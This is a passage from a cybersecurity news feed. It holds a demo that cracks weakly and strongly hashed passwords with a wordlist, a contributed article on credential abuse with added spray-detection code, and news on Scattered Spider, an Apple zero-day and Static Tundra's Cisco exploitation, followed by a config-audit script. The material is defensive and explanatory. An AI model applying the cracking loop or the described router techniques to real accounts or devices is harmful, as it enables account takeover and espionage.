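    alg, iters, salt_hex, digest_hex = record.split("$")
    if alg != "pbkdf2_sha256":
        raise ValueError(f"unsupported record format: {alg}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def crack_strong(stored: Dict[str, str]) -> Tuple[Dict[str, str], int]:
    """Same wordlist against salted records: nothing precomputed carries over
    between users, and each guess costs a full KDF run."""
    cracked, calls = {}, 0
    for user, record in stored.items():
        for candidate in WORDLIST:
            calls += 1
            if verify_strong(candidate, record):
                cracked[user] = candidate
                break
    return cracked, calls


if __name__ == "__main__":
    users = {"alice": "Summer2025", "bob": "letmein", "carol": "x9!Qm#v2Lr$7pZ"}
    weak = {u: weak_store(p) for u, p in users.items()}
    strong = {u: strong_store(p) for u, p in users.items()}
    print("weak:  ", crack_weak(weak))     # both weak passwords fall after 6 hashes
    print("strong:", crack_strong(strong))  # same result, but 13 slow KDF runs
```

    Both schemes lose the two weak passwords, which is the point of the report's policy findings: a slow salted KDF buys time and removes the shared-table shortcut, but it cannot save a password that is on the attacker's list. The cost asymmetry matters most at scale, where the salted scheme makes the attacker's work grow with the number of accounts rather than staying flat.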

    Credential-Based Attacks: A Silent but Devastating Threat

    The threat of credential abuse is both pervasive and dangerous, yet as the Blue Report 2025 highlights, organizations are still underprepared for this form of attack. And once attackers obtain valid credentials, they can easily move laterally, escalate privileges, and compromise critical systems.

    Infostealers and ransomware groups frequently rely on stolen credentials to spread across networks, burrowing deeper and deeper, often without triggering detection. This stealthy movement within the network allows attackers to maintain long dwell times, undetected, while they exfiltrate data at will.

    Despite this ongoing and well-known issue, organizations continue to prioritize perimeter defenses, often leaving identity and credential protection overlooked and under-funded as a result. This year’s Blue Report clearly shows that valid account abuse is at the core of modern cyberattacks, reinforcing the urgent need for a stronger focus on identity security and credential validation.

    Valid Accounts (T1078): The Most Exploited Path to Compromise

    One of the key findings in the Blue Report 2025 is that Valid Accounts (MITRE ATT&CK T1078) remains the most exploited attack technique, with a truly concerning 98% success rate. This means that once attackers gain access to valid credentials, whether through password cracking or initial access brokers, they can swiftly move through an organization’s network, often bypassing traditional defenses.

    The use of compromised credentials is particularly effective because it allows attackers to operate under the radar, making it harder for security teams to detect malicious activity. Once inside, they can access sensitive data, deploy malware, or create new attack paths, all while seamlessly blending in with legitimate user activity.

    How to Strengthen Your Defenses Against Credential Abuse and Password Cracking

    To protect against increasingly effective attacks, organizations should implement stronger password policies (favoring length and screening against breached-password lists over composition rules alone) while eliminating outdated hashing algorithms in favor of salted, slow alternatives. It is also essential to adopt multi-factor authentication (MFA) for all sensitive accounts, so that even if credentials are compromised, attackers cannot use them to access the network without an additional verification step.

    Regularly validating credential defenses through simulated attacks is crucial to identifying vulnerabilities and ensuring that your controls are performing as expected. Organizations also need to enhance their behavioral detection capabilities to catch anomalous activities tied to credential abuse and lateral movement.
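
    Behavioral detection for the credential-abuse patterns above, as an added example that is not part of the Blue Report or the Picus platform: three checks run over a constructed authentication log, flagging a password spray (one source failing against many accounts in a short window), a successful login from that same source shortly afterwards, and a valid-account login from a source the account has never used. The log lines, the per-account baseline of known source addresses, and the thresholds are all assumptions chosen for the demonstration.

```python
"""Added example (not from the Blue Report or Picus): behavioural detections
for compromised valid accounts (ATT&CK T1078) over a constructed auth log.
Standard library only."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in a simple syslog-like format (not real data).
SAMPLE_LOG = """\
2025-08-21T02:14:03Z vpn-gw FAILED user=alice src=203.0.113.7
2025-08-21T02:14:05Z vpn-gw FAILED user=bob src=203.0.113.7
2025-08-21T02:14:07Z vpn-gw FAILED user=carol src=203.0.113.7
2025-08-21T02:14:09Z vpn-gw FAILED user=dave src=203.0.113.7
2025-08-21T02:14:11Z vpn-gw FAILED user=erin src=203.0.113.7
2025-08-21T02:15:40Z vpn-gw SUCCESS user=erin src=203.0.113.7
2025-08-21T09:02:11Z vpn-gw SUCCESS user=alice src=198.51.100.10
2025-08-21T09:30:00Z vpn-gw FAILED user=bob src=10.20.30.40
2025-08-21T09:30:20Z vpn-gw SUCCESS user=bob src=10.20.30.40
2025-08-21T11:00:00Z vpn-gw SUCCESS user=carol src=192.0.2.99
"""

# Constructed baseline (assumption): sources each account has previously
# authenticated from; in practice learned from 30-90 days of successful logins.
KNOWN_SOURCES = {
    "alice": {"198.51.100.10"},
    "bob": {"10.20.30.40"},
    "carol": {"10.20.30.41"},
    "erin": {"10.20.30.42"},
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<result>SUCCESS|FAILED) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(log: str) -> list:
    """Parse lines into dicts with a timezone-aware timestamp; skip junk lines."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(events, known_sources=KNOWN_SOURCES, spray_users=5,
           spray_window=timedelta(minutes=10), followup=timedelta(hours=1)) -> list:
    """Return (kind, src, detail) alerts. Thresholds are assumptions to tune per site."""
    alerts = []
    failures_by_src = defaultdict(list)
    for ev in events:
        if ev["result"] == "FAILED":
            failures_by_src[ev["src"]].append(ev)

    # 1. Password spray: one source fails against many distinct accounts within the window.
    spray_end = {}
    for src, fails in failures_by_src.items():
        for i, start in enumerate(fails):
            users, last_ts = set(), start["ts"]
            for ev in fails[i:]:
                if ev["ts"] - start["ts"] > spray_window:
                    break
                users.add(ev["user"])
                last_ts = ev["ts"]
            if len(users) >= spray_users:
                spray_end[src] = last_ts
                alerts.append(("password_spray", src, sorted(users)))
                break

    for ev in events:
        if ev["result"] != "SUCCESS":
            continue
        # 2. The spray worked: a success from the spraying source soon after it stopped.
        end = spray_end.get(ev["src"])
        if end is not None and timedelta(0) <= ev["ts"] - end <= followup:
            alerts.append(("success_after_spray", ev["src"], ev["user"]))
        # 3. Valid account used from a source it has never authenticated from before.
        if ev["src"] not in known_sources.get(ev["user"], set()):
            alerts.append(("new_source_login", ev["src"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

    The single failed-then-successful login for bob from a known source produces nothing, which is the behaviour a tuned detection needs: the signal is the breadth of accounts per source and the departure from each account's baseline, not the mere presence of failures.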

    Additionally, monitoring and inspecting outbound traffic for signs of data exfiltration and ensuring that data loss prevention (DLP) measures are both in place and operating effectively are critical to protecting your sensitive information.

    Closing the Gaps in Credential and Password Management

    The findings in the Blue Report 2025 show that, unfortunately, many organizations are still vulnerable to the silent threat of password cracking and compromised accounts. And while strengthening perimeter defenses continues to be a priority, it’s also clear that core weaknesses lie in credential management and internal controls. The report also highlighted the fact that infostealers and ransomware groups are leveraging these gaps effectively.

    If you’re ready to take proactive steps to harden your security posture, reduce your exposure, and prioritize your critical vulnerabilities, the Blue Report 2025 offers invaluable insights to show you where to focus. And at Picus Security, we’re always happy to talk about helping your organization meet its specific security needs.

    Don’t forget to get your copy of The Blue Report 2025 and take proactive steps today to improve your security posture.

    This article is a contributed piece from one of The Hacker News' partners.


    Source: thehackernews.com…

  • Scattered Spider Hacker Gets 10 Years, $13M Restitution for SIM Swapping Crypto Theft

    Scattered Spider Hacker Gets 10 Years, $13M Restitution for SIM Swapping Crypto Theft

    Aug 21, 2025 | Ravie Lakshmanan | Data Breach / Cybercrime

    A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts.

    Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news outlet News4JAX.

    In addition to the 120-month federal prison term, Urban faces three years of supervised release and has been ordered to pay $13 million in restitution to victims. In a statement shared with security journalist Brian Krebs, Urban called the sentence unjust.


    Urban, who also went by the aliases Sosa, Elijah, King Bob, Gustavo Fring, and Anthony Ramirez, was arrested by U.S. authorities in Florida in January 2024 for committing wire fraud and aggravated identity theft between August 2022 and March 2023. These incidents led to the theft of at least $800,000 from at least five different victims, per the U.S. Department of Justice (DoJ).

    Prosecutors said Urban and his co-conspirators engaged in SIM swapping attacks to hijack victims’ cryptocurrency accounts and plunder the digital assets.

    In November 2024, the DoJ unsealed criminal charges against Urban and four other members of Scattered Spider for using social engineering to target employees of companies across the U.S., break into corporate networks, steal proprietary data, and siphon millions of dollars in cryptocurrency.

    Tyler Robert Buchanan, who is among those indicted, was extradited from Spain to the U.S. in April following his arrest in the European nation last June.

    The development comes as Scattered Spider has joined forces with the threat groups ShinyHunters and LAPSUS$ to form a new cybercrime alliance. The group, associated with a broader English-speaking cybercriminal collective called The Com, has a history of social engineering, credential theft, SIM swapping, initial access, ransomware deployment, data theft, and extortion attacks.

    “Scattered Spider has historically leaned on tactics that generate urgency, drive media and industry attention, create fear of exposure, and help force victims to payout quicker,” Adam Darrah, vice president of intelligence at ZeroFox, told The Hacker News in a statement.

    “Timed leaks, countdown threats, and taunts directed at security firms are all part of their playbook. They have ties to a wider network of like-minded actors, which has given them access to more tools, data, and infrastructure, multiplying their effectiveness. We regularly see groups team up when there is an increase in external pressures, like law enforcement crackdowns. To survive, these groups need to consolidate. And the result is often a more versatile and potentially dangerous combined operation.”


    Cybersecurity firm Flashpoint, which published a profile of Scattered Spider last week, said the financially motivated hacking group adopts a wave-like approach, choosing a specific sector and attacking as many organizations within that vertical as it can over a short span of time.

    “The tactics employed by Scattered Spider demonstrate their ability to exploit weaknesses in security programs by targeting people rather than strictly systems or technical vulnerabilities,” it said. “Their use of social engineering, via vishing, smishing, and MFA fatigue attacks, proves that even the most advanced technical defenses can be circumvented through human deception.”


    Source: thehackernews.com…

  • Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

    Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

    Aug 21, 2025 | Ravie Lakshmanan | Vulnerability / Zero-Day

    Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild.

    The zero-day, tracked as CVE-2025-43300, is an out-of-bounds write in the ImageIO framework: processing a malicious image can corrupt memory.

    “Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals,” the company said in an advisory.

    The iPhone maker said the bug was internally discovered and that it was addressed with improved bounds checking. The following versions address the security defect –

    • iOS 18.6.2 and iPadOS 18.6.2 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
    • iPadOS 17.7.10 – iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation
    • macOS Ventura 13.7.8 – Macs running macOS Ventura
    • macOS Sonoma 14.7.8 – Macs running macOS Sonoma
    • macOS Sequoia 15.6.1 – Macs running macOS Sequoia

    It’s currently not known who is behind the attacks or who was targeted, but Apple’s wording indicates the vulnerability has been weaponized in highly targeted attacks rather than broad campaigns.

    With the latest update, Apple has fixed a total of seven zero-days abused in real-world attacks since the start of the year; the previous six are CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, and CVE-2025-43200.

    Last month, the company also issued patches for a Safari vulnerability residing in an open-source component (CVE-2025-6558) that Google reported as having been exploited as a zero-day in the Chrome web browser.


    Source: thehackernews.com…

  • FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

    FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

    Aug 20, 2025 | Ravie Lakshmanan | Cyber Espionage / Vulnerability

    A Russian state-sponsored cyber espionage group known as Static Tundra has been observed actively exploiting a seven-year-old security flaw in Cisco IOS and Cisco IOS XE software as a means to establish persistent access to target networks.

    Cisco Talos, which disclosed details of the activity, said the attacks single out organizations in telecommunications, higher education and manufacturing sectors across North America, Asia, Africa and Europe. Prospective victims are chosen based on their “strategic interest” to Russia, it added, with recent efforts directed against Ukraine and its allies following the onset of the Russo-Ukrainian war in 2022.

    The vulnerability in question is CVE-2018-0171 (CVSS score: 9.8), a critical flaw in the Smart Install feature of Cisco IOS Software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a denial-of-service (DoS) condition or execute arbitrary code.


    It’s worth noting that the same flaw has also likely been weaponized by the China-aligned Salt Typhoon (aka Operator Panda) actors as part of attacks targeting U.S. telecommunication providers in late 2024.

    Static Tundra, per Talos, is assessed to be linked to the Federal Security Service’s (FSB) Center 16 unit and operational for over a decade, with a focus on long-term intelligence gathering operations. It’s believed to be a sub-cluster of another group that’s tracked as Berserk Bear, Crouching Yeti, Dragonfly, Energetic Bear, and Havex.

    The U.S. Federal Bureau of Investigation (FBI), in a concurrent advisory, said it has observed FSB cyber actors “exploiting Simple Network Management Protocol (SNMP) and end-of-life networking devices running an unpatched vulnerability (CVE-2018-0171) in Cisco Smart Install (SMI) to broadly target entities in the United States and globally.”

    In these attacks, the threat actors have been found collecting configuration files for thousands of networking devices associated with U.S. entities across critical infrastructure sectors. The activity is also characterized by the attackers modifying configuration files on susceptible devices to facilitate unauthorized access.

    The foothold is then abused to conduct reconnaissance within the victim networks, while simultaneously deploying custom tools like SYNful Knock, a router implant first reported by Mandiant in September 2015.

    “SYNful Knock is a stealthy modification of the router’s firmware image that can be used to maintain persistence within a victim’s network,” the threat intelligence firm said at the time. “It is customizable and modular in nature and thus can be updated once implanted.”

    Another noteworthy aspect of the attacks concerns the use of SNMP to send instructions to download a text file from a remote server and append it to the current running configuration so as to allow for additional means of access to the network devices. Defense evasion is achieved by modifying TACACS+ configuration on infected appliances to interfere with remote logging functions.


    “Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest,” Talos researchers Sara McBroom and Brandon White said. “One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective.”

    This is accomplished by setting up Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure. The adversary has also been spotted collecting and exfiltrating NetFlow data on compromised systems. The harvested data is exfiltrated via outbound TFTP or FTP connections.

    Static Tundra’s activities are primarily focused on unpatched, and often end-of-life, network devices with the goal of establishing access on primary targets and facilitating secondary operations against related targets of interest. Upon gaining initial access, the threat actors burrow deeper into the environment and hack into additional network devices for long-term access and information gathering.

    To mitigate the risk posed by the threat, Cisco is advising customers to apply the patch for CVE-2018-0171 or, if patching is not an option, to disable Smart Install with the "no vstack" global configuration command.
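
    A configuration audit for the exposure and the post-compromise changes described in this article, as an added example that is neither Cisco's nor Talos's tooling: it reads an IOS/IOS XE running-config as text and flags Smart Install not being explicitly disabled, SNMP read-write communities (the write primitive used to push config), GRE tunnels to unapproved destinations, NetFlow export to unapproved collectors, and missing AAA accounting or remote syslog. The sample config is constructed, and the allow-lists of trusted tunnel peers and flow collectors are assumptions a real deployment would fill from its own inventory.

```python
"""Added example (not Cisco's or Talos's tooling): audit a Cisco IOS/IOS XE
running-config for the Static Tundra indicators described above. The config
below is constructed; the allow-lists are placeholders for your own inventory."""
import re

SAMPLE_CONFIG = """\
version 15.2
hostname edge-rtr-1
!
aaa new-model
aaa authentication login default group tacacs+ local
!
snmp-server community public RW
snmp-server community monitor RO 10
!
interface Tunnel100
 ip address 10.255.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel mode gre ip
 tunnel destination 203.0.113.50
!
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ip flow ingress
!
ip flow-export destination 203.0.113.51 9996
ip flow-export destination 10.10.10.5 2055
!
logging host 10.10.10.20
!
end
"""

TRUSTED_TUNNEL_PEERS = {"192.0.2.2"}      # assumption: your own GRE endpoints
TRUSTED_FLOW_COLLECTORS = {"10.10.10.5"}  # assumption: your NetFlow collectors


def parse_interfaces(cfg: str) -> dict:
    """Map each 'interface X' block to its indented sub-commands."""
    interfaces, current = {}, None
    for line in cfg.splitlines():
        if line.startswith("interface "):
            current = line.split(" ", 1)[1].strip()
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None
    return interfaces


def audit(cfg: str, tunnel_peers=TRUSTED_TUNNEL_PEERS, collectors=TRUSTED_FLOW_COLLECTORS) -> list:
    """Return (severity, message) findings for the indicators in the article."""
    findings = []
    lines = [l.strip() for l in cfg.splitlines()]

    # 1. Smart Install (CVE-2018-0171 surface). A disabled device shows 'no vstack';
    #    its absence means "probably enabled" and should be confirmed with 'show vstack config'.
    if "no vstack" not in lines:
        findings.append(("high", "Smart Install not explicitly disabled ('no vstack' absent); "
                                 "patch CVE-2018-0171 or add 'no vstack'"))

    # 2. SNMP: a RW community is a remote config-write primitive; default strings are worse.
    for l in lines:
        m = re.match(r"snmp-server community (\S+) (RO|RW)(?: (\S+))?", l)
        if not m:
            continue
        name, mode, acl = m.groups()
        if mode == "RW":
            findings.append(("high", f"SNMP RW community '{name}'" + ("" if acl else " with no ACL")))
        if name.lower() in {"public", "private"}:
            findings.append(("high", f"default SNMP community string '{name}'"))

    # 3. GRE tunnels redirecting traffic off-box. GRE is the IOS default tunnel mode,
    #    so a Tunnel interface with no 'tunnel mode' line is still GRE.
    for name, sub in parse_interfaces(cfg).items():
        if not name.lower().startswith("tunnel"):
            continue
        mode = next((s for s in sub if s.startswith("tunnel mode")), "tunnel mode gre ip")
        dest = next((s.split()[-1] for s in sub if s.startswith("tunnel destination")), None)
        if "gre" in mode and dest and dest not in tunnel_peers:
            findings.append(("critical", f"{name}: GRE tunnel to unapproved destination {dest}"))

    # 4. NetFlow export to a collector you do not own.
    for l in lines:
        m = re.match(r"ip flow-export destination (\S+) (\d+)", l)
        if m and m.group(1) not in collectors:
            findings.append(("critical", f"NetFlow export to unapproved collector {m.group(1)}:{m.group(2)}"))

    # 5. Off-box accountability: TACACS+ accounting and remote syslog present?
    if not any(l.startswith("aaa accounting") for l in lines):
        findings.append(("medium", "no 'aaa accounting' (command/exec accounting to TACACS+ missing or removed)"))
    if not any(l.startswith("logging host") for l in lines):
        findings.append(("medium", "no remote syslog destination ('logging host')"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_CONFIG):
        print(f"[{severity}] {message}")
```

    Run it against configs pulled from a backup system rather than from the device itself where possible: on a compromised router the running-config is attacker-controlled, and Talos notes TACACS+ and logging changes precisely so that the box stops reporting what was done to it. Diffing the output against the last known-good backup is the quickest way to see the appended lines the SNMP technique leaves behind.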

    “The purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government,” Talos said. “This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.”


    Source: thehackernews.com…